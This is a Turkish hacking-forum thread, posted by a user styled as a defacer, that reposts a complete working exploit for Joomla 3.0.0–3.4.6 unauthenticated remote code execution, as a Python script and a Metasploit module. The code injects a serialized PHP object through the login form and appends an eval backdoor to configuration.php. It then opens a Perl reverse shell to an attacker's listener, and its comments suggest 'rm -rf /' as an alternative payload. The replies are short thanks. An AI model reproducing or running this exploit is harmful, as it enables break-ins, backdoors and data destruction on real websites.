1. Bu site çerezler kullanır. Bu siteyi kullanmaya devam ederek çerez kullanımımızı kabul etmiş olursunuz. Daha Fazla Bilgi.

Joomla 3.4.6 - Remote Code Execution Exploit

'Exploits / Vulnerabilities' forumunda 3xpl0it tarafından 21 Kasım 2019 tarihinde açılan konu

  1. 3xpl0it

    3xpl0it I L L E G A L Defacer Crew

    Katılım:
    20 Kasım 2019
    Mesaj:
    137
    Alınan Beğeniler:
    83
    Şehir:
    Server
    Web Sitesi:
    Kod:
    # Exploit Title: Joomla! 3.4.6 - Remote Code Execution
    # Google Dork: N/A
    # Date: 2019-10-02
    # Exploit Author: Alessandro Groppo
    # Vendor Homepage: https//www.joomla.it/
    # Software Link: https://downloads.joomla.org/it/cms/joomla3/3-4-6
    # Version: 3.0.0 --> 3.4.6
    # Tested on: Linux
    # CVE : N/A
    
    # Github: https://github.com/kiks7/rusty_joomla_rce
    #
    # The exploitation is implanting a backdoor in /configuration.php file in the root directory with an eval in order to be more suitable for all environments, but it is also more intrusive.
    # If you don't like this way, you can replace the get_backdoor_pay() with get_pay('php_function', 'parameter') like get_pay('system','rm -rf /')
    
    
    #!/usr/bin/env python3
    import requests
    from bs4 import BeautifulSoup
    import sys
    import string
    import random
    import argparse
    from termcolor import colored
     
    PROXS = {'http':'127.0.0.1:8080'}
    PROXS = {}
     
    def random_string(stringLength):
            letters = string.ascii_lowercase
            return ''.join(random.choice(letters) for i in range(stringLength))
     
     
    backdoor_param = random_string(50)
     
    def print_info(str):
            print(colored("[*] " + str,"cyan"))
     
    def print_ok(str):
            print(colored("[+] "+ str,"green"))
     
    def print_error(str):
            print(colored("[-] "+ str,"red"))
     
    def print_warning(str):
            print(colored("[!!] " + str,"yellow"))
     
    def get_token(url, cook):
            token = ''
            resp = requests.get(url, cookies=cook, proxies = PROXS)
            html = BeautifulSoup(resp.text,'html.parser')
            # csrf token is the last input
            for v in html.find_all('input'):
                    csrf = v
            csrf = csrf.get('name')
            return csrf
     
     
    def get_error(url, cook):
            resp = requests.get(url, cookies = cook, proxies = PROXS)
            if 'Failed to decode session object' in resp.text:
                    #print(resp.text)
                    return False
            #print(resp.text)
            return True
     
     
    def get_cook(url):
            resp = requests.get(url, proxies=PROXS)
            #print(resp.cookies)
            return resp.cookies
     
     
    def gen_pay(function, command):
            # Generate the payload for call_user_func('FUNCTION','COMMAND')
            template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
            #payload =  command + ' || $a=\'http://wtf\';'
            payload =  'http://l4m3rz.l337/;' + command
            # Following payload will append an eval() at the enabled of the configuration file
            #payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'test\\\'])) eval($_POST[\\\'test\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
            function_len = len(function)
            final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
            return final
     
    def make_req(url , object_payload):
            # just make a req with object
            print_info('Getting Session Cookie ..')
            cook = get_cook(url)
            print_info('Getting CSRF Token ..')
            csrf = get_token( url, cook)
     
            user_payload = '\\0\\0\\0' * 9
            padding = 'AAA' # It will land at this padding
            working_test_obj = 's:1:"A":O:18:"PHPObjectInjection":1:{s:6:"inject";s:10:"phpinfo();";}'
            clean_object = 'A";s:5:"field";s:10:"AAAAABBBBB' # working good without bad effects
     
            inj_object = '";'
            inj_object += object_payload
            inj_object += 's:6:"return";s:102:' # end the object with the 'return' part
            password_payload = padding + inj_object
            params = {
                'username': user_payload,
                'password': password_payload,
                'option':'com_users',
                'task':'user.login',
                csrf :'1'
                }
     
            print_info('Sending request ..')
            resp  = requests.post(url, proxies = PROXS, cookies = cook,data=params)
            return resp.text
     
    def get_backdoor_pay():
            # This payload will backdoor the the configuration .PHP with an eval on POST request
     
            function = 'assert'
            template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
            # payload =  command + ' || $a=\'http://wtf\';'
            # Following payload will append an eval() at the enabled of the configuration file
            payload =  'file_put_contents(\'configuration.php\',\'if(isset($_POST[\\\'' + backdoor_param +'\\\'])) eval($_POST[\\\''+backdoor_param+'\\\']);\', FILE_APPEND) || $a=\'http://wtf\';'
            function_len = len(function)
            final = template.replace('PAYLOAD',payload).replace('LENGTH', str(len(payload))).replace('FUNC_NAME', function).replace('FUNC_LEN', str(len(function)))
            return final
     
    def check(url):
            check_string = random_string(20)
            target_url = url + 'index.php/component/users'
            html = make_req(url, gen_pay('print_r',check_string))
            if check_string in html:
                    return True
            else:
                    return False
     
    def ping_backdoor(url,param_name):
            res = requests.post(url + '/configuration.php', data={param_name:'echo \'PWNED\';'}, proxies = PROXS)
            if 'PWNED' in res.text:
                    return True
            return False
     
    def execute_backdoor(url, payload_code):
            # Execute PHP code from the backdoor
            res = requests.post(url + '/configuration.php', data={backdoor_param:payload_code}, proxies = PROXS)
            print(res.text)
     
    def exploit(url, lhost, lport):
            # Exploit the target
            # Default exploitation will append en eval function at the end of the configuration.pphp
            # as a bacdoor. btq if you do not want this use the funcction get_pay('php_function','parameters')
            # e.g. get_payload('system','rm -rf /')
     
            # First check that the backdoor has not been already implanted
            target_url = url + 'index.php/component/users'
     
            make_req(target_url, get_backdoor_pay())
            if ping_backdoor(url, backdoor_param):
                    print_ok('Backdoor implanted, eval your code at ' + url + '/configuration.php in a POST with ' + backdoor_param)
                    print_info('Now it\'s time to reverse, trying with a system + perl')
                    execute_backdoor(url, 'system(\'perl -e \\\'use Socket;$i="'+ lhost +'";$p='+ str(lport) +';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\\\'\');')
     
     
    if __name__ == '__main__':
            parser = argparse.ArgumentParser()
            parser.add_argument('-t','--target',required=True,help='Joomla Target')
            parser.add_argument('-c','--check', default=False, action='store_true', required=False,help='Check only')
            parser.add_argument('-e','--exploit',default=False,action='store_true',help='Check and exploit')
            parser.add_argument('-l','--lhost', required='--exploit' in sys.argv, help='Listener IP')
            parser.add_argument('-p','--lport', required='--exploit' in sys.argv, help='Listener port')
            args = vars(parser.parse_args())
     
            url = args['target']
            if(check(url)):
                    print_ok('Vulnerable')
                    if args['exploit']:
                            exploit(url, args['lhost'], args['lport'])
                    else:
                            print_info('Use --exploit to exploit it')
     
            else:
                    print_error('Seems NOT Vulnerable ;/')
     
     
    metasploit_rusty_joomla_rce.rb
     
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
     
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
     
      include Msf::Exploit::Remote::HTTP::Joomla
     
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Rusty Joomla Unauthenticated Remote Code Execution',
          'Description'    => %q{
            PHP Object Injection because of a downsize in the read/write process with the database leads to RCE.
            The exploit will backdoor the configuration.php file in the root directory with en eval of a POST parameter.
            That's because the exploit is more reliabale (doesn't rely on common disabled function).
            For this reason, use it with caution and remember the house cleaning.
            Btw, you can also edit this exploit and use whatever payload you want. just modify the exploit object with
            get_payload('you_php_function','your_parameters'), e.g. get_payload('system','rm -rf /') and enjoy
          },
          'Author'  =>
            [
              'Alessandro \'kiks\' Groppo @Hacktive Security',
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
                    ['URL', 'https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41']
            ],
          'Privileged'     => false,
          'Platform'       => 'PHP',
          'Arch'           => ARCH_PHP,
          'Targets'        => [['Joomla 3.0.0 - 3.4.6', {}]],
          'DisclosureDate' => 'Oct 02  2019',
          'DefaultTarget'  => 0)
        )
     
        register_advanced_options(
          [
            OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),
          ])
      end
     
      def get_random_string(length=50)
            source=("a".."z").to_a + ("A".."Z").to_a + (0..9).to_a
            key=""
            length.times{ key += source[rand(source.size)].to_s }
            return key
      end
     
      def get_session_token
            # Get session token from cookies
            vprint_status('Getting Session Token')
            res = send_request_cgi({
                    'method' => 'GET',
                    'uri'    => normalize_uri(target_uri.path)
            })
             
            cook = res.headers['Set-Cookie'].split(';')[0]
            vprint_status('Session cookie: ' + cook)
            return cook
      end
     
      def get_csrf_token(sess_cookie)
              vprint_status('Getting CSRF Token')
     
              res = send_request_cgi({
                    'method' => 'GET',
                    'uri'    => normalize_uri(target_uri.path,'/index.php/component/users'),
                    'headers' => {
                            'Cookie' => sess_cookie,
                    }
              })
     
              html = res.get_html_document
              input_field = html.at('//form').xpath('//input')[-1]
              token = input_field.to_s.split(' ')[2]
              token = token.gsub('name="','').gsub('"','')
              if token then
                      vprint_status('CSRF Token: ' + token)
                      return token
              end
              print_error('Cannot get the CSRF Token ..')
     
      end
     
      def get_payload(function, payload)
              # @function: The PHP Function
              # @payload: The payload for the call
              template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'
              # The http:// part is necessary in order to validate a condition in SimplePie::init and trigger the call_user_func with arbitrary values
              payload = 'http://l4m3rz.l337/;' + payload
              final = template.gsub('PAYLOAD',payload).gsub('LENGTH', payload.length.to_s).gsub('FUNC_NAME', function).gsub('FUNC_LEN', function.length.to_s)
              return final
      end
     
      
      def get_payload_backdoor(param_name)
            # return the backdoor payload
            # or better, the payload that will inject and eval function in configuration.php (in the root)
            # As said in other part of the code. we cannot create new .php file because we cannot use
            # the ? character because of the check on URI schema
            function = 'assert'
            template = 's:11:"maonnalezzo":O:21:"JDatabaseDriverMysqli":3:{s:4:"\\0\\0\\0a";O:17:"JSimplepieFactory":0:{}s:21:"\\0\\0\\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:FUNC_LEN:"FUNC_NAME";s:10:"javascript";i:9999;s:8:"feed_url";s:LENGTH:"PAYLOAD";}i:1;s:4:"init";}}s:13:"\\0\\0\\0connection";i:1;}'                                                            
            # This payload will append an eval() at the end of the configuration file                                                                           
            payload =  "file_put_contents('configuration.php','if(isset($_POST[\\'"+param_name+"\\'])) eval($_POST[\\'"+param_name+"\\']);', FILE_APPEND) || $a=\'http://wtf\';"
            template['PAYLOAD']  = payload
            template['LENGTH']   = payload.length.to_s
            template['FUNC_NAME'] = function
            template['FUNC_LEN'] = function.length.to_s
            return template
     
      end
     
     
      def check_by_exploiting
                # Check that is vulnerable by exploiting it and try to inject a printr('something')
                # Get the Session anb CidSRF Tokens
                sess_token = get_session_token()
                csrf_token = get_csrf_token(sess_token)
     
                print_status('Testing with a POC object payload')
     
                username_payload = '\\0\\0\\0' * 9
                password_payload = 'AAA";'                                          # close the prev object
                password_payload += get_payload('print_r','IAMSODAMNVULNERABLE')    # actual payload
                password_payload += 's:6:"return":s:102:'                           # close cleanly the object
                res = send_request_cgi({
                            'uri'      => normalize_uri(target_uri.path,'/index.php/component/users'),
                            'method'   => 'POST',
                            'headers'  =>
                                    {
                                    'Cookie' => sess_token,
                            },
                            'vars_post' => {
                                    'username' => username_payload,
                                    'password' => password_payload,
                                    'option'   => 'com_users',
                                    'task'     => 'user.login',
                                    csrf_token => '1',
                            }
                })
                # Redirect in order to retrieve the output
                if res.redirection then
                    res_redirect = send_request_cgi({
                            'method' => 'GET',
                            'uri'    => res.redirection.to_s,
                            'headers' =>{
                                    'Cookie' => sess_token
                            }
                    })
     
                    if 'IAMSODAMNVULNERABLE'.in? res.to_s or 'IAMSODAMNVULNERABLE'.in? res_redirect.to_s then
                            return true
                    else
                            return false
                    end
                     
                end
        end
     
      def check
        # Check if the target is UP and get the current version running by info leak   
        res = send_request_cgi({'uri' => normalize_uri(target_uri.path, '/administrator/manifests/files/joomla.xml')})
        unless res
          print_error("Connection timed out")
          return Exploit::CheckCode::Unknown
        end
     
        # Parse XML to get the version
        if res.code == 200 then
                xml = res.get_xml_document
                version = xml.at('version').text
                print_status('Identified version ' + version)
                if version <= '3.4.6' and version >= '3.0.0' then
                        if check_by_exploiting()
                            return Exploit::CheckCode::Vulnerable
                        else
                            if check_by_exploiting() then
                            # Try the POC 2 times.
                                    return Exploit::CheckCode::Vulnerable
                            else
                                    return Exploit::CheckCode::Safe
                            end
                        end
                else
                        return Exploit::CheckCode::Safe
                end
        else
                print_error('Cannot retrieve XML file for the Joomla Version. Try the POC in order to confirm if it\'s vulnerable')
                if check_by_exploiting() then
                        return Exploit::CheckCode::Vulnerable
                else
                        if check_by_exploiting() then
                            return Exploit::CheckCode::Vulnerable
                        else
                            return Exploit::CheckCode::Safe
                        end
                end
        end
      end
     
     
     
       
      def exploit
        if check == Exploit::CheckCode::Safe && !datastore['FORCE']
          print_error('Target is not vulnerable')
          return
        end
     
     
        pwned = false
        cmd_param_name = get_random_string(50)
     
        sess_token = get_session_token()
        csrf_token = get_csrf_token(sess_token)
     
        # In order to avoid problems with disabled functions
        # We are gonna append an eval() function at the end of the configuration.php file
        # This will not cause any problem to Joomla and is a good way to execute then PHP directly
        # cuz assert is toot annoying and with conditions that we have we cannot inject some characters
        # So we will use 'assert' with file_put_contents to append the string. then create a reverse shell with this backdoor
        # Oh i forgot, We cannot create a new file because we cannot use the '?' character in order to be interpreted by the web server.
     
        # TODO: Add the PHP payload object to inject the backdoor inside the configuration.php file
        #           Use the implanted backdoor to receive a nice little reverse shell with a PHP payload
     
         
        # Implant the backdoor
        vprint_status('Cooking the exploit ..')
        username_payload = '\\0\\0\\0' * 9
        password_payload = 'AAA";'                                          # close the prev object
        password_payload += get_payload_backdoor(cmd_param_name)            # actual payload
        password_payload += 's:6:"return":s:102:'                           # close cleanly the object
     
        print_status('Sending exploit ..')
     
     
        res = send_request_cgi({
                    'uri'      => normalize_uri(target_uri.path,'/index.php/component/users'),
                    'method'   => 'POST',
                    'headers'  => {
                            'Cookie' => sess_token
                    },
                    'vars_post' => {
                            'username' => username_payload,
                            'password' => password_payload,
                            'option'   => 'com_users',
                            'task'     => 'user.login',
                            csrf_token => '1'
                    }
        })
     
        print_status('Triggering the exploit ..')   
        if res.redirection then
            res_redirect = send_request_cgi({
                    'method' => 'GET',
                    'uri'    => res.redirection.to_s,
                    'headers' =>{
                            'Cookie' => sess_token
                    }
            })
        end
     
        # Ping the backdoor see if everything is ok :/
        res = send_request_cgi({
                    'method'     => 'POST',
                    'uri'        => normalize_uri(target_uri.path,'configuration.php'),
                    'vars_post'  => {
                            cmd_param_name  => 'echo \'PWNED\';'
                    }
            })
        if res.to_s.include? 'PWNED' then
            print_status('Target P0WN3D! eval your code at /configuration.php with ' + cmd_param_name + ' in a POST')
            pwned = true
        end
     
     
     
        if pwned then
            print_status('Now it\'s time to reverse shell')
                    res = send_request_cgi({
                    'method'     => 'POST',
                    'uri'        => normalize_uri(target_uri.path,'configuration.php'),
                    'vars_post'  => {
                            cmd_param_name  => payload.encoded
                    }
            })
        end
     
      end
    end
     
    #  0day.today [2019-11-05]  #
     
    R3dSystem ve 3vil4org bunu beğendi.
  2. 3vil4org

    3vil4org Registered Registered

    Katılım:
    21 Kasım 2019
    Mesaj:
    13
    Alınan Beğeniler:
    0
    Cinsiyet:
    Erkek
    Şehir:
    Ankara
    eyvallah kral
     
  3. 3xpl0it

    3xpl0it I L L E G A L Defacer Crew

    Katılım:
    20 Kasım 2019
    Mesaj:
    137
    Alınan Beğeniler:
    83
    Şehir:
    Server
    Web Sitesi:
    rica ederim
     
  4. Evils

    Evils root@evils:~$ Administrator

    Katılım:
    13 Eylül 2019
    Mesaj:
    505
    Alınan Beğeniler:
    178
    Cinsiyet:
    Erkek
    Şehir:
    Germany
    Web Sitesi:
    yararlı.
     
  5. 3xpl0it

    3xpl0it I L L E G A L Defacer Crew

    Katılım:
    20 Kasım 2019
    Mesaj:
    137
    Alınan Beğeniler:
    83
    Şehir:
    Server
    Web Sitesi:
    teşekkürler
     
  6. MrX

    MrX Legendary Legendary

    Katılım:
    22 Eylül 2019
    Mesaj:
    610
    Alınan Beğeniler:
    160
    Cinsiyet:
    Erkek
    Şehir:
    Ağın İçindeki Ağ!
    yararlı
     
  7. 3xpl0it

    3xpl0it I L L E G A L Defacer Crew

    Katılım:
    20 Kasım 2019
    Mesaj:
    137
    Alınan Beğeniler:
    83
    Şehir:
    Server
    Web Sitesi:
    <3
     
    MrX bunu beğendi.